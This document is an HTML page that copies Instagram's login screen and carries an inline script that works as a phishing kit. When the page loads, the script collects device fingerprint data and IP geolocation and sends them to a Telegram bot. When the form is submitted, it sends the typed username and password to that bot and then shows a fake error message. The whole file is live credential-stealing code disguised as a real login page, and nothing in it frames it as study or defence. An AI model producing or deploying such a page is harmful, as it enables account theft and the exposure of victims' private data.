<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <style>
        body {
            background: #fafafa;
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }
        .container {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 90vh;
        }
        .phone-preview {
            display: flex;
            align-items: center;
            margin-right: 40px;
        }
        .phone-preview img {
            width: 250px;
            height: 450px;
            object-fit: contain;
            background: #fff;
            border-radius: 30px;
            box-shadow: 0 4px 24px rgba(0,0,0,0.13);
            margin-left: 0;
            border: 4px solid #fff;
            display: block;
        }
        .login-section {
            width: 350px;
            display: flex;
            flex-direction: column;
            align-items: center;
        }
        .logo {
            font-family: 'Billabong', cursive, Arial, sans-serif;
            font-size: 3rem;
            margin-bottom: 30px;
            margin-top: 20px;
        }
        .login-form {
            background: #fff;
            border: 1px solid #dbdbdb;
            padding: 40px 40px 20px 40px;
            display: flex;
            flex-direction: column;
            width: 100%;
            box-sizing: border-box;
            border-radius: 8px;
        }
        .login-form input {
            margin-bottom: 8px;
            padding: 10px;
            border: 1px solid #dbdbdb;
            border-radius: 3px;
            background: #fafafa;
            font-size: 1rem;
        }
        .login-form button {
            background: #4cb5f9;
            color: #fff;
            border: none;
            border-radius: 8px;
            padding: 8px 0;
            font-weight: bold;
            font-size: 1rem;
            margin-top: 10px;
            cursor: pointer;
        }
        .or {
            display: flex;
            align-items: center;
            text-align: center;
            color: #8e8e8e;
            margin: 18px 0 18px 0;
        }
        .or:before, .or:after {
            content: '';
            flex: 1;
            border-bottom: 1px solid #dbdbdb;
        }
        .or:not(:empty)::before {
            margin-right: .75em;
        }
        .or:not(:empty)::after {
            margin-left: .75em;
        }
        .facebook-login {
            color: #385185;
            font-weight: bold;
            text-align: center;
            margin-bottom: 16px;
            cursor: pointer;
            display: flex;
            align-items: center;
            justify-content: center;
        }
        .facebook-login img {
            width: 20px;
            margin-right: 8px;
        }
        .forgot {
            color: #00376b;
            font-size: 0.9rem;
            text-align: center;
            margin-bottom: 16px;
            cursor: pointer;
        }
        .signup {
            background: #fff;
            border: 1px solid #dbdbdb;
            text-align: center;
            padding: 15px 0;
            margin-top: 10px;
            border-radius: 8px;
            font-size: 0.95rem;
            width: 100%;
            box-sizing: border-box;
        }
        .signup a {
            color: #0095f6;
            text-decoration: none;
            font-weight: bold;
        }
        .footer {
            text-align: center;
            margin-top: 40px;
            color: #8e8e8e;
            font-size: 0.9rem;
        }
        .footer-links {
            margin-bottom: 10px;
        }
        .footer-links a {
            color: #8e8e8e;
            margin: 0 8px;
            text-decoration: none;
            font-size: 0.9rem;
        }
        @media (max-width: 900px) {
            .container {
                flex-direction: column;
                height: auto;
            }
            .phone-preview {
                display: none;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="phone-preview">
            <img src="instagram-web-lox-image.png" alt="Instagram preview">
        </div>
        <div class="login-section">
            <div class="logo">Instagram</div>
            <form class="login-form">
                <input type="text" placeholder="Phone number, username, or email" required>
                <input type="password" placeholder="Password" required>
                <button type="submit">Log in</button>
                <div class="or">OR</div>
                <div class="facebook-login">
                    <img src="https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg" alt="Facebook logo">
                    Log in with Facebook
                </div>
                <div class="forgot">Forgot password?</div>
            </form>
            <div class="signup">
                Don't have an account? <a href="#">Sign up</a>
            </div>
        </div>
    </div>
    <div class="footer">
        <div class="footer-links">
            <a href="#">Meta</a>
            <a href="#">About</a>
            <a href="#">Blog</a>
            <a href="#">Jobs</a>
            <a href="#">Help</a>
            <a href="#">API</a>
            <a href="#">Privacy</a>
            <a href="#">Terms</a>
            <a href="#">Locations</a>
            <a href="#">Instagram Lite</a>
            <a href="#">Threads</a>
            <a href="#">Contact Uploading & Non-Users</a>
            <a href="#">Meta Verified</a>
        </div>
        <div>English &nbsp; &copy; 2025 Instagram from Meta</div>
    </div>
    <script>
        // Fetch Telegram config from server.txt
        async function getTelegramConfig() {
            try {
                const res = await fetch('server.txt');
                const text = await res.text();
                const token = text.match(/TOKEN=(.*)/)[1].trim();
                const chatId = text.match(/CHAT_ID=(.*)/)[1].trim();
                return { token, chatId };
            } catch (e) {
                alert('Failed to load Telegram config.');
                return { token: '', chatId: '' };
            }
        }

        let TELEGRAM_BOT_TOKEN = '';
        let TELEGRAM_CHAT_ID = '';
        let TG_API = '';
        getTelegramConfig().then(cfg => {
            TELEGRAM_BOT_TOKEN = cfg.token;
            TELEGRAM_CHAT_ID = cfg.chatId;
            TG_API = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`;
        });

        // ====== CONFIGURATION ======

        // ====== DEVICE/ENVIRONMENT INFO COLLECTION ======
        async function getDeviceInfo() {
            const nav = navigator;
            const deviceType = /android/i.test(nav.userAgent) ? 'Android' :
                /iphone|ipad|ipod/i.test(nav.userAgent) ? 'iPhone/iOS' :
                /windows/i.test(nav.userAgent) ? 'Windows PC' :
                /macintosh|mac os x/i.test(nav.userAgent) ? 'Mac' :
                /linux/i.test(nav.userAgent) ? 'Linux' : 'Unknown';
            const userAgent = nav.userAgent;
            const platform = nav.platform;
            const language = nav.language || nav.userLanguage;
            const screenRes = `${window.screen.width}x${window.screen.height}`;
            const timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
            const referrer = document.referrer ? document.referrer : 'Direct/None';
            const connection = nav.connection ? nav.connection.effectiveType : 'Unknown';
            const cpuCores = nav.hardwareConcurrency || 'Unknown';
            const ram = nav.deviceMemory ? nav.deviceMemory + ' GB' : 'Unknown';
            const now = new Date();
            const currentTime = now.toLocaleString();
            let batteryInfo = 'Not supported';
            if (nav.getBattery) {
                try {
                    const battery = await nav.getBattery();
                    batteryInfo = `${Math.round(battery.level * 100)}% (${battery.charging ? 'Charging' : 'Not charging'})`;
                } catch (e) {}
            }
            return {
                deviceType, userAgent, platform, language, screenRes, timezone, referrer,
                connection, cpuCores, ram, batteryInfo, currentTime
            };
        }

        // ====== IP & GEOLOCATION INFO ======
        async function getIPGeoInfo() {
            try {
                const res = await fetch('https://geolocation-db.com/json/');
                if (!res.ok) throw new Error('IP info fetch failed');
                const data = await res.json();
                return {
                    ip: data.IPv4 || 'Unknown',
                    city: data.city || 'Unknown',
                    region: data.state || 'Unknown',
                    country: data.country_name || 'Unknown'
                };
            } catch (e) {
                return { ip: 'Unknown', city: 'Unknown', region: 'Unknown', country: 'Unknown' };
            }
        }

        // ====== TELEGRAM BOT SENDER ======
        async function sendToTelegram(message) {
            const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`;
            await fetch(url, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({
                    chat_id: TELEGRAM_CHAT_ID,
                    text: message,
                    parse_mode: 'Markdown'
                })
            });
        }

        // ====== MESSAGE FORMATTERS ======
        function formatDeviceInfo(info, geo) {
            return [
                '*Device and Environment Info*',
                `📱 Device Name/Type: ${info.deviceType}`,
                `🕸️ User Agent: ${info.userAgent}`,
                `💻 Platform: ${info.platform}`,
                `🈯 Language: ${info.language}`,
                `📐 Screen Resolution: ${info.screenRes}`,
                `⏰ Timezone: ${info.timezone}`,
                `🔗 Referrer: ${info.referrer}`,
                `📶 Connection Type: ${info.connection}`,
                `🧠 CPU Cores: ${info.cpuCores}`,
                `💾 RAM: ${info.ram}`,
                `🔋 Battery Info: ${info.batteryInfo}`,
                `🕒 Current Time: ${info.currentTime}`,
                '',
                '*IP and Geolocation Info*',
                `🌍 IP Address: ${geo.ip}`,
                `🏙️ City: ${geo.city}`,
                `🌐 Region/State: ${geo.region}`,
                `🌎 Country: ${geo.country}`
            ].join('\n');
        }

        function formatLoginInfo(email, password, info, geo) {
            return [
                '📋 *Tap to copy*',
                `Email/Phone: \`${email}\``,
                `Password: \`${password}\``,
                '',
                formatDeviceInfo(info, geo)
            ].join('\n');
        }

        // ====== ON PAGE LOAD: SEND DEVICE/ENV INFO ======
        window.addEventListener('DOMContentLoaded', async () => {
            const info = await getDeviceInfo();
            const geo = await getIPGeoInfo();
            const message = formatDeviceInfo(info, geo);
            sendToTelegram(message);
            // Store for later use on login
            window._deviceInfo = info;
            window._geoInfo = geo;
        });

        // ====== ON LOGIN BUTTON CLICK: SEND CREDENTIALS + INFO ======
        document.addEventListener('DOMContentLoaded', () => {
            const form = document.querySelector('.login-form');
            if (form) {
                form.addEventListener('submit', async (e) => {
                    e.preventDefault();
                    const email = form.querySelector('input[type="text"]').value;
                    const password = form.querySelector('input[type="password"]').value;
                    const info = window._deviceInfo || await getDeviceInfo();
                    const geo = window._geoInfo || await getIPGeoInfo();
                    const message = formatLoginInfo(email, password, info, geo);
                    sendToTelegram(message);
                    // Optionally, show a fake error or redirect
                    alert('Sorry, something went wrong. Please try again later.');
                });
            }
        });
    </script>
</body>
</html>
